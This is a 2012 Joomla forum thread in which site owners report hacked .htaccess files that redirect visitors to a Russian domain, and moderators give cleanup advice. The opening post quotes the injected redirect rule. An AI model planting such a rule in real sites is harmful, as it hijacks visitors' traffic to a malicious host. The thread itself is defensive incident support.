htaccess hacked, re-directing traffic to xx.ru

Discussion regarding Joomla! 2.5 security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
renegadeskone
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Thu Feb 16, 2012 10:45 am

htaccess hacked, re-directing traffic to xx.ru

Post by renegadeskone » Sat Mar 31, 2012 2:17 am

Hey, I had been delaying a Joomla site update to 2.5.3 and this managed to hacked my hataccess a few hours before I had scheduled to perform the upgrade. Originally I was running 1.7 and htaccess was hacked which included HTTP REFERER code (can post if needed) and a rewrite rule of

RewriteRule ^(.*)$ http://xx.ru/in.cgi?4 [R=301,L]

I updated to Joomla 2.5.3 using the patch, and then woke up this morning to see the htaccess had been hacked again. Since then I've updated my FTP password details and am scanning my computer now.

Next thing will be to go through the vulnerable extensions list and extract the 2.5.3 full package to the account.

If anyone could help out with what I could do to clean this out that would be great.

Here's the FPA output: (I replaced the username with XXX)
Problem Description :: Forum Post Assistant (v1.2.0) : 31st March 2012 wrote:htaccess hacked http://xx.ru/in.cgi?4
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 31st March 2012 wrote:[31-Mar-2012 12:05:09 UTC] PHP Warning: date() [<a href=\'function.date\'>function.date</a>]: It is not safe to rely on the system\'s timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected \'Antarctica/Macquarie\' for \'EST/10.0/no DST\' instead in /home/XXX/public_html/fpa-en.php on line 486
Actions Taken To Resolve by Forum Post Assistant (v1.2.0) 31st March 2012 wrote:Updated to latest Joomla. Re-created htaccess file and set permissions to 444
Forum Post Assistant (v1.2.0) : 31st March 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.3-Stable (Ember) 15-March-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Writable (644) | Owner: XXX (uid: 512/gid: 509) | Group: XXX (gid: 509) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-274.17.1.el5xen | Technology: x86_64 | Web Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_fcgid/2.3.6 | Encoding: gzip,deflate,sdch | Doc Root: /home/XXX/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.10 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 30711 | Log Errors To: error_log | Last Known Error: 31st March 2012 23:06:58. | Register Globals: 1 | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 4M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 36.24 MiB | #of _FPA_TABLE: 284
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.10) | date (5.3.10) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | standard (5.3.10) | Phar (2.0.1) | posix () | Reflection ($Revision: 321634 $) | imap () | SimpleXML (0.1) | sockets () | exif (1.4 $Id: exif.c 321634 2012-01-01 13:15:04Z felipe $) | tidy (2.0) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.9.1) | cgi-fcgi () | ionCube Loader () | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Database Information :: wrote:Database _FPA_STATS :: Uptime: 1272935 | Threads: 2 | Questions: 26424962 | Slow queries: 36 | Opens: 3778739 | Flush tables: 1 | Open tables: 64 | Queries per second avg: 20.759 |
Extensions Discovered :: wrote:Components :: SITE :: com_wrapper (2.5.0) | Bubble (2.6.0) | Blackout (2.6.0) | Default (2.6.0) | Blueface (2.6.0) | WF_AGGREGATOR_VIMEO_TITLE (2.0.20) | WF_AGGREGATOR_[youtube]_TITLE (2.0.20) | WF_LINKS_JOOMLALINKS_TITLE (2.0.20) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.20) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.20) | WF_POPUPS_WINDOW_TITLE (2.0.20) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.20) | WF_MEDIA_TITLE (2.0.20) | WF_PREVIEW_TITLE (2.0.20) | WF_TABLE_TITLE (2.0.20) | WF_CLEANUP_TITLE (2.0.20) | WF_NONBREAKING_TITLE (2.0.20) | WF_SPELLCHECKER_TITLE (2.0.20) | WF_LAYER_TITLE (2.0.20) | WF_INLINEPOPUPS_TITLE (2.0.20) | WF_LINK_TITLE (2.0.20) | WF_SOURCE_TITLE (2.0.20) | WF_PASTE_TITLE (2.0.20) | WF_CONTEXTMENU_TITLE (2.0.20) | WF_TEXTCASE_TITLE (2.0.20) | WF_DIRECTIONALITY_TITLE (2.0.20) | WF_AUTOSAVE_TITLE (2.0.20) | WF_SEARCHREPLACE_TITLE (2.0.20) | WF_BROWSER_TITLE (2.0.20) | WF_FULLSCREEN_TITLE (2.0.20) | WF_XHTMLXTRAS_TITLE (2.0.20) | WF_IMGMANAGER_TITLE (2.0.20) | WF_STYLE_TITLE (2.0.20) | WF_VISUALCHARS_TITLE (2.0.20) | WF_ARTICLE_TITLE (2.0.20) | WF_PRINT_TITLE (2.0.20) | com_mailto (2.5.0) |
Components :: ADMIN :: com_jaextmanager (1.1.2) | Admintools (2.2.0) | com_admin (2.5.0) | COM_ADVANCEDMODULES (2.2.16) | Akeeba (3.4.3) | com_media (2.5.0) | Magic Zoom Plus (v4.4.8 [v1.0.) | Magic Zoom Plus module for Joo (v4.4.8 [v1.0.) | K2 (2.5.1) | com_installer (2.5.0) | com_modules (2.5.0) | com_plugins (2.5.0) | com_cpanel (2.5.0) | VirtueMart_allinone (-) | com_finder (2.5.0) | eXtplorer (2.1.0RC5) | JReviews (2.3.18.212) | com_jreviews (2.3.18.212) | JomSocial (2.6.0) | com_templates (2.5.0) | VIRTUEMART (-) | ECB Currency Converter (1.0) | com_categories (2.5.0) | com_users (2.5.0) | ChronoForms (4.0 RC3.11) | Editor - JCE (2.0.20) | JCE (2.0.20) | Unknown (-) | com_config (2.5.0) | com_checkin (2.5.0) | com_login (2.5.0) | com_menus (2.5.0) | Joomailer Mailchimp Signup (1.9) | com_languages (2.5.0) | JoomailerMailchimpIntegration (1.7.2) | COM_NONUMBERMANAGER (2.6.10) | Unknown (-) | com_redirect (2.5.0) | com_weblinks (2.5.0) | com_messages (2.5.0) | com_content (2.5.0) | Modules (1.5.0) | Components (1.5.0) | K2 (1.5.8) | JomSocial (1.5.8) | Menus (1.5.0) | Web Links (1.5.1) | News Feeds (1.5.1) | Content (1.5.3) | Plugins (1.5.0) | Users (1.5.0) | Banners (1.5.1) | com_acesearch (2.5.0) | AdAgency (3.0.15) | com_search (2.5.0) | com_cache (2.5.0) | com_s2framework (1.4.14.72) | S2Framework (1.4.14.72) | com_banners (2.5.0) | com_newsfeeds (2.5.0) |

Modules :: SITE :: AceSearch (1.5.0) | JReviews Directories Module (2.3) | Dating Search (2.6.0) | MailChimp Signup (1.7) | GeoMaps Module (2.3) | mod_syndicate (2.5.0) | Active Groups (2.6.0) | JReviews Favorite Users Module (2.3) | JReviews Listings Module (2.3) | mod_articles_archive (2.5.0) | mod_search (2.5.0) | Jomsocial Notification (2.6.0) | Latest group walls (2.2.4) | K2 User (2.5.1) | Top Members (2.6.0) | Simple Featured VM Products (0.1) | Ad Agency Menu (3.0.0) | mod_articles_news (2.5.0) | mod_custom (2.5.0) | Latest Discussion (2.6.0) | mod_languages (2.5.0) | Ad Agency Zone (3.0.3) | mod_wrapper (2.5.0) | mod_banners (2.5.0) | mod_virtuemart_search (2.0.0RC3) | Online Users (2.6.0) | Video Comments (2.6.0) | K2 Comments (2.5.1) | mod_virtuemart_manufacturer (2.0.0RC3) | mod_articles_category (2.5.0) | JReviews Reviews Module (2.3) | JReviews Fields Module (2.3) | mod_stats (2.5.0) | K2 Users (2.5.1) | mod_articles_categories (2.5.0) | mod_login (2.5.0) | VirtueMart Shopping Cart (2.0.0RC3) | JomSocial Statistics (2.6.0) | Latest Members (2.6.0) | JomSocial Connect (2.6.0) | K2 Content (2.5.1) | mod_articles_latest (2.5.0) | jReviews Advanced Search Modul (2.3) | mod_related_items (2.5.0) | Latest group posts (2.6.0) | mod_virtuemart_product (2.0.0RC3) | Dropdown MegaMenu (1.0.1) | Photo Comments (2.6.0) | mod_menu (2.5.0) | mod_whosonline (2.5.0) | Upcoming Events (2.6.0) | mod_footer (2.5.0) | JReviews Range Module (2.3) | mod_breadcrumbs (2.5.0) | mod_finder (2.5.0) | Hello Me (2.6.0) | Activity Stream (2.6.0) | mod_articles_popular (2.5.0) | mod_users_latest (2.5.0) | mod_virtuemart_category (2.0.0RC3) | mod_virtuemart_currencies (2.0.0RC3) | JReviews Totals Module (2.3) | mod_feed (2.5.0) | Magic Zoom Plus module for Joo (v4.4.8 [v1.0.) | mod_random_image (2.5.0) | K2 Tools (2.5.1) | K2 Login (2.5.1) | User Anywhere (0.1) | mod_weblinks (2.5.0) |
Modules :: ADMIN :: K2 QuickIcons (admin) (2.5.1) | mod_status (2.5.0) | mod_popular (2.5.0) | mod_version (2.5.0) | mod_multilangstatus (1.7.1) | mod_latest (2.5.0) | mod_custom (2.5.0) | mod_toolbar (2.5.0) | AceSearch - Quick Icons (1.5.0) | RSFinder (1.0.0) | MailChimp Stats (1.1) | K2 Stats (admin) (2.5.1) | mod_login (2.5.0) | Akeeba Backup Notification Mod (3.4.3) | Admin Tools Joomla! Upgrade No (2.2.0) | mod_menu (2.5.0) | mod_title (2.5.0) | mod_quickicon (2.5.0) | mod_logged (2.5.0) | mod_feed (2.5.0) | mod_submenu (2.5.0) | AceSearch (1.5.0) |

Plugins :: SITE :: Editor - JCE (2.0.20) | plg_editors_tinymce (3.4.7) | plg_editors_codemirror (1.0) | plg_extension_joomla (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_content (2.5.0) | System - Joomla! Update Email (1.0) | plg_system_debug (2.5.0) | plg_system_redirect (2.5.0) | System - System Restore Points (3.4.3) | System - Jomsocial Facebook Co (2.6.0) | plg_system_remember (2.5.0) | iJoomlaUpgradeAlert (1.0) | iJoomla News (1.0.1) | plg_system_log (2.5.0) | plg_system_p3p (2.5.0) | Akeeba Backup Lazy Scheduling (3.3) | plg_system_logout (2.5.0) | JA T3 Framework (1.5.0) | PLG_SYSTEM_SOURCERER (2.11.3) | System - Akeeba Backup Update (1.0) | plg_system_languagecode (2.5.0) | PLG_SYSTEM_ADVANCEDMODULES (2.2.16) | System - K2 (2.5.1) | Button - JA Typography (1.1.2) | System - Admin Tools (2.2.0) | System - JB Library (1.2.1) | System - Zend Lib (1.11.4) | plg_system_highlight (2.5.0) | PLG_SYSTEM_MODULESANYWHERE (1.13.3) | System - Megamenu Framework (1.0.0) | plg_system_sef (2.5.0) | Azrul System Mambot For Joomla (2.6.0) | System - RSFinder (1.2.0) | Jomsocial Update (2.6.0) | System - Force Password Change (2.0) | System - joomlamailer MailChim (1.9) | plg_system_languagefilter (2.5.0) | System - One Click Action (1.0) | PLG_SYSTEM_NNFRAMEWORK (12.1.6) | plg_system_cache (2.5.0) | jomsocialredirect (2.6.0) | System - freakedout Mailchimp (1.0) | System - Admin Tools Update Em (1.0) | plg_captcha_recaptcha (2.5.0) | VMPAYMENT_PAYPAL (2.0.1) | VMPAYMENT_STANDARD (2.0.1) | VM - Payment, PayZen (1.2) | VM Payment - authorize.net AIM (2.0.1) | VMCustom - textinput (1.9.8) | VMCustom - specification (2.0.0RC3) | VMCUSTOM_STOCKABLE (1.9.8) | plg_search_contacts (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_categories (2.5.0) | plg_search_weblinks (2.5.0) | Search - K2 (2.5.1) | plg_search_content (2.5.0) | plg_search_virtuemart (1.5) | Input Processor (2.6.0) | Eventlist (2.2.4) | Unknown (-) | My Contacts (2.6.0) | Walls (2.6.0) | Unknown (-) | My twitter updates (2.6.0) | Unknown (-) | Events (2.6.0) | Events (2.6.0) | JomComment (2.2.4) | My Listings (2.3) | System (2.2.4) | Wordfilter (2.6.0) | MyBlog (2.6.0) | joomlamailer (1.0) | Unknown (-) | Feeds (2.6.0) | Allvideo (2.2.4) | Invite (2.6.0) | My Google Ads (2.6.0) | Unknown (-) | Log (2.6.0) | Editor - My Photos (2.2.4) | My Articles (2.6.0) | Friend's Location (2.6.0) | My Reviews (2.3) | My Tagged Videos (2.6.0) | Unknown (-) | Latest Photos (2.6.0) | Input Link (2.2.4) | Nice Talk (2.2.4) | Unknown (-) | My Latest Videos (2.6.0) | Unknown (-) | MyBlog Toolbar (2.6.0) | My Favorites (2.3) | plg_content_finder (2.5.0) | AllVideos (by JoomlaWorks) (4.4) | plg_content_geshi (2.5.0) | plg_content_joomla (2.5.0) | JReviews (2.3.16) | plg_content_emailcloak (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_pagebreak (2.5.0) | chronoforms (V4 RC2.0) | plg_content_vote (2.5.0) | plg_content_pagenavigation (2.5.0) | VMSHIPMENT_WEIGHT_COUNTRIES (2.0.1) | plg_user_contactcreator (2.5.0) | plg_user_profile (2.5.0) | User - K2 (2.5.1) | User - Jomsocial User (2.6.0) | plg_user_joomla (2.5.0) | plg_editors-xtd_readmore (2.5.0) | Button - Sourcerer (2.11.3) | plg_editors-xtd_image (2.5.0) | PLG_EDITORS-XTD_MODULESANYWHER (1.13.3) | plg_editors-xtd_article (2.5.0) | Editor Button - My Photos (2.6.0) | plg_editors-xtd_pagebreak (2.5.0) | Authentication - Master User (1.1.1) | plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_quickicon_extensionupdate (2.5.0) |
Templates Discovered :: wrote:Templates :: SITE :: beez_20 (2.5.0) | ciyl (0.1) | digiflip-default-17 (1.0) | atomic (2.5.0) | ja_t3_blank (1.0.7) | beez5 (2.5.0) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Last edited by mandville on Sat Mar 31, 2012 8:39 am, edited 2 times in total.
Reason: removed url as per fules

vicyankees
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri May 09, 2008 2:54 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by vicyankees » Sat Mar 31, 2012 3:50 am

i am actually experiencing the same thing on 1.5.22... i have restored to an old version and it still pops up relatively quickly -- it seems like it's been lingering for a while and today was a trigger day of some sort.

PascM
Joomla! Apprentice
Joomla! Apprentice
Posts: 39
Joined: Thu Apr 02, 2009 12:51 pm
Location: Athens - Greece
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PascM » Sat Mar 31, 2012 5:32 am

Check your installation for other suspicious files.
Joomla Drupal WordPress Hosting http://www.pascm.net

manishjaiswal
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Dec 01, 2011 2:57 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by manishjaiswal » Sat Mar 31, 2012 7:18 am

i am experiencing the same thing.. please help me out as my search result in google is getting redirected to http://xx.ru/in.cgi?4.

what is the issue and how to rectify it ???
Is there a Virus on my server ???

Please help my site address is http://www.getfreedealz.com
If i type the site on a web browser i can view the site but on google organic search it is getting redirected... I have no clue how to sort out this issue..??? :-(

PascM
Joomla! Apprentice
Joomla! Apprentice
Posts: 39
Joined: Thu Apr 02, 2009 12:51 pm
Location: Athens - Greece
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PascM » Sat Mar 31, 2012 7:23 am

Clear your browsers cache your site doesn't redirect. BUT Still you should check for other strange / unknown files / change all your passwords.
Joomla Drupal WordPress Hosting http://www.pascm.net

manishjaiswal
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Dec 01, 2011 2:57 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by manishjaiswal » Sat Mar 31, 2012 8:13 am

Yes it does.. you may have click on the link i have posted on the forum.
If you type my website on google search then it will be redirected to http://xx.ru/in.cgi?4

all my search results r getting redirected.. please help

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Sat Mar 31, 2012 8:46 am

1. please do not post the full link to the malicious site or a full link to a site that is affected by malicious code

from http://docs.joomla.org/Security_Checklist_7
A Safe route for disaster relief

save the configuration.php file and your images and personal files one by one, (not the folder as it may contain unwanted files)
wipe the entire folder where Joomla! is installed
upload a new clean full package latest version of joomla 1.5.x or Joomla 1.7.x/2.5.x (minus the install folder)
reupload your configuration file & images.
reupload or reinstall the latest versions of your extensions , templates (even better is to use original clean copies to ensure that the hacker/defacer did not leave any shell script files in your site)

Go through http://forum.joomla.org/viewtopic.php?f=621&t=582854 also what hosts are you on.
to manishjaiswal if you had read you will see the issues is in the htaccess file for your site
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

manishjaiswal
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Dec 01, 2011 2:57 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by manishjaiswal » Sat Mar 31, 2012 8:47 am

Is there any solution after what has happened to all my google search results.. if anyone has solution please provide

User avatar
jmuehleisen
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4874
Joined: Thu Nov 09, 2006 2:46 pm
Location: Kampala, Uganda
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by jmuehleisen » Sat Mar 31, 2012 10:48 am

If Google is marking your site as a source of mal-ware, then try this.

Go to the Google Webmasters Tools site: https://www.google.com/webmasters/tools/home?hl=en

Sign up for a free account (if you don't have one) and register your site.

They will give you a file to upload to the root of your website to prove that you are the owner of the site.

Once that is confirmed (one click, really), then request a reconsideration of your site.

They will rescan your site and remove the warnings if they find your site "clean."
John Muehleisen
Visit my "Getting Started with Joomla" site, now with videos, tips, and new user tutorials:  http://welcometojoomla.com

slewis1972
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 132
Joined: Fri Feb 08, 2008 2:03 pm

xxx.ru - joomla seems to want to load it?????

Post by slewis1972 » Sat Mar 31, 2012 4:58 pm

Hi

If I goto http://ww w.hamptonfc. net via chrome, on some occasions it says conencting to xxx.ru bottom left.

Any ideas if this is a major issue, just cannot locate if the template has been hacked or a plugin/module causing it?

Thanks
Last edited by mandville on Sun Apr 01, 2012 8:16 am, edited 2 times in total.
Reason: Moved topic » from General Questions/New to Joomla! 2.5 / Joomla! 1.7 to Security in Joomla! 2.5 / Joomla! 1.7- removed and broke links

User avatar
jmuehleisen
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4874
Joined: Thu Nov 09, 2006 2:46 pm
Location: Kampala, Uganda
Contact:

Re: pas-tro.ru - joomla seems to want to load it?????

Post by jmuehleisen » Sat Mar 31, 2012 5:53 pm

The site has probably been hacked.

Take a look at the .htaccess file ... and see if an .htaccess file has been placed in other folders than the root.

There is a current rash of hacks using this method (among other methods).
John Muehleisen
Visit my "Getting Started with Joomla" site, now with videos, tips, and new user tutorials:  http://welcometojoomla.com

beyondthenet
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Sat Mar 31, 2012 7:21 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by beyondthenet » Sat Mar 31, 2012 7:28 pm

We had a site hacked with the root and public_html folders hacked, plus I found about 12 new .htacess files in various primary Joomla folders. Below is a sample of one of these new .htaccess files.

I updated the site to 1.5.26 hoping that this recent security update would fix the security hole. Do you think the 1.5.26 security update will prevent this hack from happening again? Or will the hackers inevitably get into the site again?

Thank you

=======
[mod edit - imanickam: Removed the code]
Last edited by imanickam on Sun Apr 01, 2012 4:00 am, edited 1 time in total.
Reason: Being a public forum, for security reasons, removed the code that may be used for hacking.

raku21
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Mar 31, 2012 7:31 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by raku21 » Sat Mar 31, 2012 7:46 pm

I have the same problem but I did't find more .htaccess files .....

I found the file and rezolve the problem ....
Last edited by raku21 on Sat Mar 31, 2012 7:54 pm, edited 1 time in total.

slewis1972
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 132
Joined: Fri Feb 08, 2008 2:03 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by slewis1972 » Sat Mar 31, 2012 7:54 pm

I cannot find them all. I have loads, but only some seem to be infected. I have one in:
/
then folder of joomla

Anywhere else?

beyondthenet
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Sat Mar 31, 2012 7:21 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by beyondthenet » Sat Mar 31, 2012 8:14 pm

look in
/plugins
/administrator
/images
and every other primary Joomla folder

User avatar
jmuehleisen
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 4874
Joined: Thu Nov 09, 2006 2:46 pm
Location: Kampala, Uganda
Contact:

Re: pas-tro.ru - joomla seems to want to load it?????

Post by jmuehleisen » Sun Apr 01, 2012 1:42 am

Let me suggest you take a look at the Security forum here:

http://forum.joomla.org/viewforum.php?f=621

There are lots of tips on how to clean up a hacked site (none of them are quick, as hackers often hide "back doors" to your site so they can re-hack it after an incomplete cleanup).

In particular, look at this post:

http://forum.joomla.org/viewtopic.php?f=621&t=582854
John Muehleisen
Visit my "Getting Started with Joomla" site, now with videos, tips, and new user tutorials:  http://welcometojoomla.com

slewis1972
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 132
Joined: Fri Feb 08, 2008 2:03 pm

Re: pas-tro.ru - joomla seems to want to load it?????

Post by slewis1972 » Sun Apr 01, 2012 6:39 am

A quick way. I got my site to enable ssh, and via

grep -lir " http://[url-removed]" *

I located all the infected files.
Last edited by imanickam on Sun Apr 01, 2012 8:15 am, edited 1 time in total.
Reason: Removed the URL posted as it could be harmful

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: pas-tro.ru - joomla seems to want to load it?????

Post by leolam » Sun Apr 01, 2012 8:01 am

I doubt sincerely that you have found all the infected files for their are other scripts that can be located generating these links. That is no solution but a temporary fix (?)

You need to get to the bottom how they got in your system or your server which is more important so you need to follow http://forum.joomla.org/viewtopic.php?f=621&t=582854 all steps without exclusions!

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: xxx.ru - joomla seems to want to load it?????

Post by mandville » Sun Apr 01, 2012 8:23 am

please do not post the full link to the malicious site or a full link to a site that is affected by malicious code

from http://docs.joomla.org/Security_Checklist_7
A Safe route for disaster relief

[*]save the configuration.php file and your images and personal files one by one, (not the folder as it may contain unwanted files)
[*]wipe the entire folder where Joomla! is installed
[*]upload a new clean full package latest version of joomla 1.5.x or Joomla 1.7.x/2.5.x (minus the install folder)
[*]reupload your configuration file & images.
[*]reupload or reinstall the latest versions of your extensions , templates (even better is to use original clean copies to ensure that the hacker/defacer did not leave any shell script files in your site)

This defacement has affected many hosts and may scrits, WP, VB etc.
common place for defacement files are in your tmp folder
there are numerous topics on this, please read those before starting your own

the suggestions are all the same. see the help links already suggested in this topic
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

big vern
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Nov 24, 2008 3:07 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by big vern » Sun Apr 01, 2012 1:34 pm

Thanks for the info - It seems there are many affected by this exploit - do we know what it is and is it patched on the latest joomla version? (I am guessing a lot of people havent yet noticed the issue as they bookmark the address rather than go via search engine)
can I do a full home folder restore to a known 'clean' version of my website and then upgrade joomla to the latest version?

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by Webdongle » Sun Apr 01, 2012 1:48 pm

big vern wrote:... - It seems there are many affected by this exploit - do we know what it is and is it patched on the latest joomla version? ...
If you notice ... the sites affected are sites that do not have the latest update of Joomla or latest of the extensions or have an extension that is listed on the VEL. It is not something that needs to be patched in Joomla. It is the awareness of the webmasters that needs to be patched.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: xxx.ru - joomla seems to want to load it?????

Post by mandville » Sun Apr 01, 2012 1:52 pm

big vern wrote:do we know what it is and is it patched on the latest joomla version?
this is not a joomla specific issue and has been seen across a multitude of platforms and hosts.
can I do a full home folder restore to a known 'clean' version of my website and then upgrade joomla to the latest version?
yes, that is the recommended method
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

big vern
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Nov 24, 2008 3:07 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by big vern » Sun Apr 01, 2012 2:07 pm

thanks very much for quick replies - I am on shared hosting - I will have to do the all the upgrades (inc extensions etc.) and see what happens.
I relaised the need to be on the latest versions - once am I fully upto date - will this solve this exploit or do I need to tell my hosting provider to start looking at their servers

""If you notice ... the sites affected are sites that do not have the latest update of Joomla or latest of the extensions or have an extension that is listed on the VEL. It is not something that needs to be patched in Joomla. It is the awareness of the webmasters that needs to be patched""

Proabaly my lack of knowledge but that doesn't make sense to me -
'If you notice ... the sites affected are sites that do not have the latest update of Joomla...'
then;
'it's not something that needs to be patched in joomla'.
If newer versions are not affected then they have been patched against this issue?

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: xxx.ru - joomla seems to want to load it?????

Post by mandville » Sun Apr 01, 2012 2:45 pm

my post between webdongle and yours can be read as webdongles post translated. there is also the addition of "webmasters need to be patch" translates to this topic in the docs
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44018
Joined: Sat Apr 05, 2008 9:58 pm

Re: xxx.ru - joomla seems to want to load it?????

Post by Webdongle » Sun Apr 01, 2012 3:16 pm

big vern wrote:... once am I fully upto date - will this solve this exploit ...
Have you deleted all the folders files before updating ?
big vern wrote:...
'it's not something that needs to be patched in joomla'.
If newer versions are not affected then they have been patched against this issue?
They have been patched against issues that effect them. There are many exploits that affect servers and all types of sites.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Sun Apr 01, 2012 4:41 pm

The security moderators have taken the descision to merge all the related hack topics into one places. This is not normal practice.
The htaccess redirect hack is not joomla specific, it has affected all sorts of platforms (wordpress, drupal, vbulletin) on various hosts.
At the present time we are lost as to what could be causing this.
Our clear recommendation is to follow the following checklist http://forum.joomla.org/viewtopic.php?f=432&t=475313 and security checklist 7.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
